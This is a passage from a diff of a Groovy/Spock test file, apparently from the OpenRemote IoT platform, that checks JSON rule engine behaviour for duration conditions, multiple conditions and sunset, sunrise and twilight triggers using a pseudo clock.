+      def light = assetStorageService.find(lightId)
+      assert light != null
+    }
+
+    when: "a thing asset is added to the building realm"
+    def thingId = UniqueIdentifierGenerator.generateId("TestThing")
+    def thingAsset = new ThingAsset("TestThing")
+            .setId(thingId)
+            .setRealm(keycloakTestSetup.realmBuilding.name)
+            .setLocation(new GeoJSONPoint(0, 0))
+    thingAsset.getAttributes().get("notes").get().addMeta(ruleState)
+    thingAsset = assetStorageService.merge(thingAsset)
+
+    then: "the thing asset should be present"
+    conditions.eventually {
+      def thing = assetStorageService.find(thingId)
+      assert thing != null
+    }
+
+    // RuleSet: WHEN:
+    // Any light asset has brightness higher than 50 for 5 minutes and onOff is true
+    // AND
+    // Any thing asset has notes set to "Test"
+    // OR
+    // Any light asset has a note that equals "TriggerDuration" for 10 minutes
+    // THEN:
+    // Set the notes of the light asset to "Triggered"
+
+    when: "a ruleset with a duration map has been added"
+    def rulesStr = getClass().getResource("/org/openremote/test/rules/JsonAttributeDurationRule.json").text
+    def rule = parse(rulesStr, JsonRulesetDefinition.class).orElseThrow()
+    Ruleset ruleset = new RealmRuleset(
+            keycloakTestSetup.realmBuilding.name,
+            "Duration Rule",
+            Ruleset.Lang.JSON,
+            rulesStr)
+    ruleset = rulesetStorageService.merge(ruleset)
+    def lastFireTimestamp = 0
+
+    then: "the rule engines to become available and be running with asset states inserted"
+    conditions.eventually {
+      realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
+      assert realmBuildingEngine != null
+      assert realmBuildingEngine.isRunning()
+      assert realmBuildingEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_BUILDING + 4 // 4 additional rule states
+      assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    when: "the light asset is updated with brightness set to 100"
+    lightAsset = assetStorageService.find(lightId)
+    lightAsset.getAttribute("brightness").get().setValue(100)
+    assetStorageService.merge(lightAsset)
+
+    then: "the brightness value should be 100"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("brightness").get().getValue().orElse(0) == 100
+    }
+
+    when: "time advances for 6 seconds"
+    advancePseudoClock(6, TimeUnit.SECONDS, container)
+
+    then: "the rule engine should have fired"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    and: "the light asset should still have its notes attribute be empty"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == ""
+    }
+
+    when: "the thing asset is updated with notes set to Test"
+    thingAsset = assetStorageService.find(thingId)
+    thingAsset.getAttribute("notes").get().setValue("Test")
+    assetStorageService.merge(thingAsset)
+
+    then: "the thing asset should have its notes set to Test"
+    conditions.eventually {
+      def thing = assetStorageService.find(thingId)
+      assert thing.getAttribute("notes").get().getValue().orElse("") == "Test"
+    }
+
+    when: "time advances by 6 seconds"
+    advancePseudoClock(6, TimeUnit.SECONDS, container)
+
+    then: "the rule engine should have fired"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    and: "the light asset should still have its notes attribute be empty"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == ""
+    }
+
+    when: "time advances for 5 minutes"
+    advancePseudoClock(5, TimeUnit.MINUTES, container)
+
+    then: "the rule engine should have fired"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    and: "the light asset should have its notes attribute be empty" // because onOff is still false
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == ""
+    }
+
+    when: "the light asset is updated with onOff set to true"
+    lightAsset = assetStorageService.find(lightId)
+    lightAsset.getAttribute("onOff").get().setValue(true)
+    assetStorageService.merge(lightAsset)
+
+    then: "the light asset should have its onOff attribute set to true"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("onOff").get().getValue().orElse(false) == true
+    }
+
+    when: "time advances for 6 seconds"
+    advancePseudoClock(6, TimeUnit.SECONDS, container)
+
+    then: "the rule engine should have fired"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    and: "the light asset should have its notes attribute set to Triggered" // because onOff was set to true, and brightness was above 50 for 5 minutes and the thing asset notes was set to Test
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == "Triggered"
+    }
+
+    when: "the light asset notes is updated to empty"
+    lightAsset = assetStorageService.find(lightId)
+    lightAsset.getAttribute("notes").get().setValue("")
+    assetStorageService.merge(lightAsset)
+
+    then: "the light asset should have its notes attribute be empty"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == ""
+    }
+
+    when: "time advances for 10 minutes"
+    advancePseudoClock(10, TimeUnit.MINUTES, container)
+
+    then: "the rule engine should have fired"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    and: "the light asset should have its notes attribute be empty"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == ""
+    }
+
+
+    when: "the light asset notes is updated to TriggerDuration"
+    lightAsset = assetStorageService.find(lightId)
+    lightAsset.getAttribute("notes").get().setValue("TriggerDuration")
+    assetStorageService.merge(lightAsset)
+
+    then: "the light asset should have its notes attribute be TriggerDuration"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == "TriggerDuration"
+    }
+
+
+    // Start OR condition part
+    when: "time advances for 6 seconds"
+    advancePseudoClock(6, TimeUnit.SECONDS, container)
+
+    then: "the rule engine should have fired"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    and: "the light asset should have its notes attribute be TriggerDuration"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == "TriggerDuration"
+    }
+
+    when: "time advances for 10 minutes"
+    advancePseudoClock(10, TimeUnit.MINUTES, container)
+
+    then: "the rule engine should have fired"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    and: "the light asset should have its notes attribute be Triggered" // because the OR condition was satisfied (thing asset notes was set to Test for 10 minutes)
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == "Triggered"
+    }
+
+    when: "the light asset notes and brightness are updated and thing asset notes is updated to empty"
+    lightAsset = assetStorageService.find(lightId)
+    lightAsset.getAttribute("notes").get().setValue("")
+    lightAsset.getAttribute("brightness").get().setValue(0)
+    thingAsset = assetStorageService.find(thingId)
+    thingAsset.getAttribute("notes").get().setValue("")
+    assetStorageService.merge(lightAsset)
+    assetStorageService.merge(thingAsset)
+
+    then: "the light asset should have its notes attribute be empty"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == ""
+      assert light.getAttribute("brightness").get().getValue().orElse(0) == 0
+      def thing = assetStorageService.find(thingId)
+      assert thing.getAttribute("notes").get().getValue().orElse("") == ""
+    }
+
+    when: "time advances for 1 minute"
+    advancePseudoClock(1, TimeUnit.MINUTES, container)
+
+    then: "the rule engine should have fired"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    and: "the light asset should have its notes empty abd brightness set to 0 and thing asset notes set to empty"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == ""
+      assert light.getAttribute("brightness").get().getValue().orElse(0) == 0
+      def thing = assetStorageService.find(thingId)
+      assert thing.getAttribute("notes").get().getValue().orElse("") == ""
+    }
+
+    when: "time advances for 6 seconds"
+    advancePseudoClock(6, TimeUnit.SECONDS, container)
+
+    then: "the rule engine should have fired and"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    when: "light asset brightness is updated to 100 and thing asset notes is updated to Test"
+    lightAsset = assetStorageService.find(lightId)
+    lightAsset.getAttribute("brightness").get().setValue(100)
+    thingAsset = assetStorageService.find(thingId)
+    thingAsset.getAttribute("notes").get().setValue("Test")
+    assetStorageService.merge(lightAsset)
+    assetStorageService.merge(thingAsset)
+
+    then: "the light asset should have its brightness set to 100"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("brightness").get().getValue().orElse(0) == 100
+      def thing = assetStorageService.find(thingId)
+      assert thing.getAttribute("notes").get().getValue().orElse("") == "Test"
+    }
+
+    when: "time advances for 6 seconds"
+    advancePseudoClock(6, TimeUnit.SECONDS, container)
+
+    then: "the rule engine should have fired"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    and: "the light asset should have its notes attribute be empty"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == ""
+    }
+
+    when: "time advances for 3 minutes"
+    advancePseudoClock(3, TimeUnit.MINUTES, container)
+
+    then: "the rule engine should have fired"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    and: "the light asset should have its notes attribute be empty"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == ""
+    }
+
+    when: "brightness is updated to 0"
+    lightAsset = assetStorageService.find(lightId)
+    lightAsset.getAttribute("brightness").get().setValue(0)
+    assetStorageService.merge(lightAsset)
+
+    then: "the light asset should have its brightness set to 0" // this is done to reset the duration of the matched state
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("brightness").get().getValue().orElse(0) == 0
+    }
+
+    when: "time advances for 6 seconds"
+    advancePseudoClock(6, TimeUnit.SECONDS, container)
+
+    then: "the rule engine should have fired"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    and: "the light asset should have its notes attribute be empty"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == ""
+    }
+
+    when: "brightness is updated to 100"
+    lightAsset = assetStorageService.find(lightId)
+    lightAsset.getAttribute("brightness").get().setValue(100)
+    assetStorageService.merge(lightAsset)
+
+    then: "the light asset should have its brightness set to 100" // set to 100 to start the duration of the matched state
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("brightness").get().getValue().orElse(0) == 100
+    }
+
+    when: "time advances for 6 seconds"
+    advancePseudoClock(6, TimeUnit.SECONDS, container)
+
+    then: "the rule engine should have fired"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    and: "the light asset should have its notes attribute be empty"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == ""
+    }
+
+    when: "time advances for 4 minutes"
+    advancePseudoClock(3, TimeUnit.MINUTES, container)
+
+    then: "the rule engine should have fired"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    and: "the light asset should have its notes attribute be empty" // because brightness was set to 0 in between so the timer was reset for that attribute match
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == ""
+    }
+
+    when: "time advances for 3 minutes"
+    advancePseudoClock(3, TimeUnit.MINUTES, container)
+
+    then: "the rule engine should have fired"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    and: "the light asset should have its notes attribute be Triggered" // because brightness has been above 50 for 5 minutes.
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == "Triggered"
+    }
+  }
+
+  def "Trigger actions based on multiple LHS conditions"() {
+    given: "the container environment is started"
+    def conditions = new PollingConditions(timeout: 15, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def rulesService = container.getService(RulesService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    def timerService = container.getService(TimerService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    RulesEngine realmBuildingEngine
+
+    and: "the pseudo clock is stopped"
+    stopPseudoClock()
+
+    when: "a light asset is added to the building realm"
+    def lightId = UniqueIdentifierGenerator.generateId("Light")
+    def lightAsset = new LightAsset("Light")
+            .setId(lightId)
+            .setRealm(keycloakTestSetup.realmBuilding.name)
+            .setLocation(new GeoJSONPoint(0, 0))
+
+
+    def ruleState = new MetaItem<>(MetaItemType.RULE_STATE)
+    lightAsset.getAttributes().get("brightness").get().addMeta(ruleState)
+    lightAsset.getAttributes().get("onOff").get().addMeta(ruleState)
+    assetStorageService.merge(lightAsset)
+
+    then: "the light asset should be present"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light != null
+    }
+
+    // RuleSet: WHEN:
+    // Any light asset has brightness greater than 50
+    // AND
+    // Any light asset has onOff set to true
+    // THEN:
+    // Set the notes of the light asset to "Matched"
+    when: "a ruleset with multiple LHS conditions has been added"
+    def rulesStr = getClass().getResource("/org/openremote/test/rules/JsonMultipleLHSConditionsRule.json").text
+    def rule = parse(rulesStr, JsonRulesetDefinition.class).orElseThrow()
+    Ruleset ruleset = new RealmRuleset(
+            keycloakTestSetup.realmBuilding.name,
+            "Multi LHS Rule",
+            Ruleset.Lang.JSON,
+            rulesStr)
+    ruleset = rulesetStorageService.merge(ruleset)
+    def lastFireTimestamp = 0
+
+    then: "the rule engines to become available and be running with asset states inserted"
+    conditions.eventually {
+      realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
+      assert realmBuildingEngine != null
+      assert realmBuildingEngine.isRunning()
+      assert realmBuildingEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_BUILDING + 2 // 2 additional rule states
+      assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    and: "the light asset should have its notes attribute be empty"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == ""
+    }
+
+    when: "the light asset brightness is updated to 100 and onOff is updated to true and time advances for 3 seconds"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(lightId, LightAsset.BRIGHTNESS, 100))
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(lightId, LightAsset.ON_OFF, true))
+
+    // advance time to 3 seconds to ensure the rule engine has fired
+    advancePseudoClock(3, TimeUnit.SECONDS, container)
+
+    then: "the light asset should have its notes attribute be Matched because the LHS conditions were satisfied"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == "Matched"
+    }
+
+    and: "the rule engine should have fired"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    when: "notes is updated to empty and time advances for 3 seconds"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(lightId, LightAsset.NOTES, ""))
+
+    // advance time to 3 seconds to ensure the rule engine has fired
+    advancePseudoClock(3, TimeUnit.SECONDS, container)
+
+    then: "the light asset should have its notes attribute be empty"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == ""
+    }
+
+    and: "the rule engine should have fired"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    when: "brightness is updated to 10, thus not satisfying the LHS conditions and time advances for 3 seconds"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(lightId, LightAsset.BRIGHTNESS, 10))
+
+    // advance time to 3 seconds to ensure the rule engine has fired
+    advancePseudoClock(3, TimeUnit.SECONDS, container)
+
+    then: "the light asset should have its notes attribute be empty because the LHS conditions were not satisfied"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == ""
+    }
+
+    and: "the rule engine should have fired"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    when: "brightness is updated to 100, thus satisfying the LHS conditions and time advances for 3 seconds"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(lightId, LightAsset.BRIGHTNESS, 100))
+
+    // advance time to 3 seconds to ensure the rule engine has fired
+    advancePseudoClock(3, TimeUnit.SECONDS, container)
+
+    then: "the light asset should have its notes attribute be set to Matched because the LHS conditions were satisfied"
+    conditions.eventually {
+      def light = assetStorageService.find(lightId)
+      assert light.getAttribute("notes").get().getValue().orElse("") == "Matched"
+    }
+
+    and: "the rule engine should have fired"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+  }
+
+  def "Trigger actions based on the position of the sun"() {
+
+    given: "the container environment is started"
+    def conditions = new PollingConditions(timeout: 15, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def pushNotificationHandler = container.getService(PushNotificationHandler.class)
+    def emailNotificationHandler = container.getService(EmailNotificationHandler.class)
+    def notificationService = container.getService(NotificationService.class)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def rulesService = container.getService(RulesService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    def timerService = container.getService(TimerService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    RulesEngine realmBuildingEngine
+
+    and: "a thing asset is added to the building realm"
+    def thingId = UniqueIdentifierGenerator.generateId("TestThing")
+    def thingAsset = new ThingAsset("TestThing")
+            .setId(thingId)
+            .setRealm(keycloakTestSetup.realmBuilding.name)
+            .setLocation(new GeoJSONPoint(0, 0))
+            .addAttributes(
+            new Attribute<>("sunset", ValueType.INTEGER, null),
+            new Attribute<>("sunriseWithOffset", ValueType.INTEGER, null),
+            new Attribute<>("twilightHorizon", ValueType.INTEGER, null),
+            )
+    thingAsset = assetStorageService.merge(thingAsset)
+
+    and: "the pseudo clock is stopped"
+    stopPseudoClock()
+
+    when: "a ruleset with sunset trigger condition is added whose action updates the thing asset"
+    def rulesStr = getClass().getResource("/org/openremote/test/rules/JsonRuleSunset.json").text
+    def rule = parse(rulesStr, JsonRulesetDefinition.class).orElseThrow()
+    Ruleset ruleset = new RealmRuleset(
+            keycloakTestSetup.realmBuilding.name,
+            "Sunset Rule",
+            Ruleset.Lang.JSON,
+            rulesStr)
+    ruleset = rulesetStorageService.merge(ruleset)
+    def sunsetCalculator = JsonRulesBuilder.getSunCalculator(ruleset, rule.rules[0].when.groups[0].items[0].sun, timerService)
+    def sunTimes = sunsetCalculator.execute()
+    def lastFireTimestamp = 0
+
+    then: "the rule engines to become available and be running with asset states inserted"
+    conditions.eventually {
+      realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
+      assert realmBuildingEngine != null
+      assert realmBuildingEngine.isRunning()
+      assert realmBuildingEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_BUILDING
+      assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+      assert sunsetCalculator != null
+    }
+
+    and: "the next sunset should be calculated and should be in the future"
+    assert sunTimes.getSet() != null
+    assert sunTimes.getSet().toInstant().isAfter(timerService.getNow())
+
+    and: "the rule should not have triggered"
+    conditions.eventually {
+      thingAsset = assetStorageService.find(thingId) as ThingAsset
+      assert thingAsset.getAttribute("sunset").get().getValue().orElse(0) == 0
+    }
+
+    when: "time advances slightly"
+    advancePseudoClock(1, TimeUnit.SECONDS, container)
+
+    then: "the rule engine should have fired again and the rule should not have triggered"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
+      thingAsset = assetStorageService.find(thingId) as ThingAsset
+      assert thingAsset.getAttribute("sunset").get().getValue().orElse(0) == 0
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    when: "time advances slightly past the next sunset time and the rule engine fires"
+    advancePseudoClock(Duration.between(timerService.getNow(), sunTimes.getSet()).getSeconds()+1, TimeUnit.SECONDS, container)
+
+    then: "the rule engine should have fired again and the rule should have triggered"
+    def lastUpdateTime = 0
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
+      thingAsset = assetStorageService.find(thingId) as ThingAsset
+      assert thingAsset.getAttribute("sunset").get().getValue().orElse(0) == 100
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+      lastUpdateTime = thingAsset.getAttribute("sunset").get().getTimestamp().orElse(0)
+    }
+
+    when: "time advances slightly"
+    advancePseudoClock(1, TimeUnit.SECONDS, container)
+
+    then: "the rule engine should have fired again and the rule should not have triggered"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp >= lastFireTimestamp + 1000
+      thingAsset = assetStorageService.find(thingId) as ThingAsset
+      assert thingAsset.getAttribute("sunset").get().getTimestamp().orElse(-1) == lastUpdateTime
+    }
+
+    when: "time advances past the sunset"
+    sunTimes = sunsetCalculator.on(sunTimes.getSet().plusHours(1)).execute()
+    advancePseudoClock(Duration.between(timerService.getNow(), sunTimes.getRise()).getSeconds(), TimeUnit.SECONDS, container)
+
+    and: "the updated attribute is cleared"
+    thingAsset.getAttribute("sunset").get().setValue(null)
+    thingAsset = assetStorageService.merge(thingAsset)
+
+    then: "the rule engine should have fired again and the rule should not have triggered"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
+      thingAsset = assetStorageService.find(thingId) as ThingAsset
+      assert thingAsset.getAttribute("sunset").get().getValue().orElse(0) == 0
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    when: "time advances slightly past the next sunset time and the rule engine fires"
+    sunTimes = sunsetCalculator.on(sunTimes.getSet().plusHours(1)).execute()
+    advancePseudoClock(Duration.between(timerService.getNow(), sunTimes.getSet().plusSeconds(10)).getSeconds()+1, TimeUnit.SECONDS, container)
+
+    then: "the rule engine should have fired again and the rule should have triggered"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
+      thingAsset = assetStorageService.find(thingId) as ThingAsset
+      assert thingAsset.getAttribute("sunset").get().getValue().orElse(0) == 100
+    }
+
+    when: "a schedule is added to the rule to enable it 2 hours after sunset each day"
+    ruleset.setValidity(new CalendarEvent(sunTimes.getSet().plusHours(2).toDate(), sunTimes.getSet().plusHours(12).toDate(), new Recur<>(Frequency.DAILY, 5)))
+    ruleset = rulesetStorageService.merge(ruleset)
+
+    then: "the rule should become paused in the engine"
+    conditions.eventually {
+      assert realmBuildingEngine.deployments.get(ruleset.id).status == PAUSED
+    }
+
+    when: "the updated attribute is cleared"
+    thingAsset.getAttribute("sunset").get().setValue(null)
+    thingAsset = assetStorageService.merge(thingAsset)
+
+    and: "time advances into the next active time of the rule"
+    sunTimes = sunsetCalculator.on(sunTimes.getSet().plusHours(1)).execute()
+    advancePseudoClock(Duration.between(timerService.getNow(), sunTimes.getSet().plusHours(4)).getSeconds(), TimeUnit.SECONDS, container)
+
+    then: "the rule should become un-paused in the engine"
+    conditions.eventually {
+      assert realmBuildingEngine.deployments.get(ruleset.id).status == DEPLOYED
+    }
+
+    then: "the rule engine should have fired again and the rule should not have triggered (as past sunset)"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
+      thingAsset = assetStorageService.find(thingId) as ThingAsset
+      assert thingAsset.getAttribute("sunset").get().getValue().orElse(0) == 0
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    when: "a ruleset with sunrise offset trigger condition is added whose action updates the thing asset"
+    rulesStr = getClass().getResource("/org/openremote/test/rules/JsonRuleSunriseOffset.json").text
+    rule = parse(rulesStr, JsonRulesetDefinition.class).orElseThrow()
+    ruleset = new RealmRuleset(
+            keycloakTestSetup.realmBuilding.name,
+            "Sunrise with offset Rule",
+            Ruleset.Lang.JSON,
+            rulesStr)
+    ruleset = rulesetStorageService.merge(ruleset)
+    sunsetCalculator = JsonRulesBuilder.getSunCalculator(ruleset, rule.rules[0].when.groups[0].items[0].sun, timerService)
+    sunTimes = sunsetCalculator.execute()
+
+    then: "the rule engines to become available and be running with asset states inserted"
+    conditions.eventually {
+      realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
+      assert realmBuildingEngine != null
+      assert realmBuildingEngine.isRunning()
+      assert realmBuildingEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_BUILDING
+      assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    and: "the next sunrise should be calculated and should be in the future"
+    assert sunTimes.getRise() != null
+    assert sunTimes.getRise().toInstant().isAfter(timerService.getNow())
+
+    and: "the rule should not have triggered"
+    conditions.eventually {
+      thingAsset = assetStorageService.find(thingId) as ThingAsset
+      assert thingAsset.getAttribute("sunriseWithOffset").get().getValue().orElse(0) == 0
+    }
+
+    when: "time advances slightly past the next sunrise time and the rule engine fires"
+    advancePseudoClock(Duration.between(timerService.getNow(), sunTimes.getRise()).getSeconds()+1, TimeUnit.SECONDS, container)
+
+    then: "the rule engine should have fired again and the rule should not have triggered"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
+      thingAsset = assetStorageService.find(thingId) as ThingAsset
+      assert thingAsset.getAttribute("sunriseWithOffset").get().getValue().orElse(0) == 0
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    when: "time advances past the offset delay and the rule engine fires"
+    advancePseudoClock(rule.rules[0].when.groups[0].items[0].sun.offsetMins, TimeUnit.MINUTES, container)
+
+    then: "the rule engine should have fired again and the rule should have triggered"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
+      thingAsset = assetStorageService.find(thingId) as ThingAsset
+      assert thingAsset.getAttribute("sunriseWithOffset").get().getValue().orElse(0) == 100
+    }
+
+    when: "a ruleset with twilight trigger condition is added whose action updates the thing asset"
+    rulesStr = getClass().getResource("/org/openremote/test/rules/JsonRuleTwilight.json").text
+    rule = parse(rulesStr, JsonRulesetDefinition.class).orElseThrow()
+    ruleset = new RealmRuleset(
+            keycloakTestSetup.realmBuilding.name,
+            "Twilight Rule",
+            Ruleset.Lang.JSON,
+            rulesStr)
+    ruleset = rulesetStorageService.merge(ruleset)
+    sunsetCalculator = JsonRulesBuilder.getSunCalculator(ruleset, rule.rules[0].when.groups[0].items[0].sun, timerService)
+    sunTimes = sunsetCalculator.execute()
+
+    then: "the rule engines to become available and be running with asset states inserted"
+    conditions.eventually {
+      realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
+      assert realmBuildingEngine != null
+      assert realmBuildingEngine.isRunning()
+      assert realmBuildingEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_BUILDING
+      assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
+      lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
+    }
+
+    and: "the next twilight should be calculated and should be in the future"
+    assert sunTimes.getRise() != null
